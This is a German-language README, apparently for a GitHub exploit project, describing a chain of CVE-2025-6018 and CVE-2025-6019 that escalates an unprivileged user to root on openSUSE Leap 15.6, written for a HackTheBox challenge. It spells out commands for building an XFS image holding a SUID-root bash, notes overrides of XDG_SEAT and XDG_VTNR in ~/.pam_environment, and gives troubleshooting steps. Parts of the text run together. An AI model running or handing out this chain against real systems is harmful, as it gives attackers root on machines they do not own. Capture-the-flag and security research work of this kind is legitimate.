
Exploit-Kette zur Privilegieneskalation (CVE-2025-6018 + CVE-2025-6019) für openSUSE Leap 15.6
Dieser Exploit wurde entwickelt, um eine HackTheBox-Challenge zu lösen, die openSUSE Leap 15.6 betrifft.
Dieser Exploit basiert auf der ursprünglichen Forschung des Qualys Security Teams:
Zusätzliche Referenzimplementierung:
Dieser Exploit verkettet zwei Schwachstellen, um eine lokale Privilege-Escalation von einem unprivilegierten Benutzer zu root auf openSUSE Leap 15.6 zu erreichen:
Der Exploit erfordert ein zuvor erstelltes XFS-Dateisystem-Image, das eine SUID-bash-Binärdatei enthält. Dieses muss auf einem Linux-Rechner erstellt werden, auf dem Sie Root-Rechte besitzen:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Überprüfen Sie, ob das Image korrekt erstellt wurde:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment mit XDG_SEAT- und XDG_VTNR-OverridesWenn der Exploit fehlschlägt:
file xfs.imagesystemctl status udisks2Dieser Exploit dient nur zu Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie eine Testberechtigung haben.